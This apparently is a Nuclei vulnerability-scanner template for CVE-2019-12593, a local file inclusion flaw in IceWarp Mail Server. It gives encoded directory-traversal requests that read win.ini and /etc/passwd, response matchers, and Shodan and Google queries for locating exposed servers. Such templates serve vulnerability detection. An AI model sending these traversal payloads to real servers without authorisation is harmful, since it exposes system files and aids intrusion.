49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2019-12593
|
|
|
|
info:
|
|
name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: |
|
|
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
|
|
remediation: |
|
|
Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
|
|
reference:
|
|
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
|
|
- http://www.icewarp.com
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12593
|
|
- http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-12593
|
|
cwe-id: CWE-22
|
|
epss-score: 0.15747
|
|
epss-percentile: 0.95391
|
|
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: icewarp
|
|
product: mail_server
|
|
shodan-query: title:"icewarp"
|
|
google-query: Powered By IceWarp 10.4.4
|
|
tags: packetstorm,cve,cve2019,lfi,icewarp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
|
|
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "[intl]"
|
|
- "root:x:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502210086f51045e0ead5976f13e486ef5cce3ff40979c4cd21123b32f35e63d7c3d36002204491bd87c1b4b97a1d0ed0e21bbd53e8a87715b719c461742cb64a2230b7e0d6:922c64590222798bb761d5b6d8e72950 |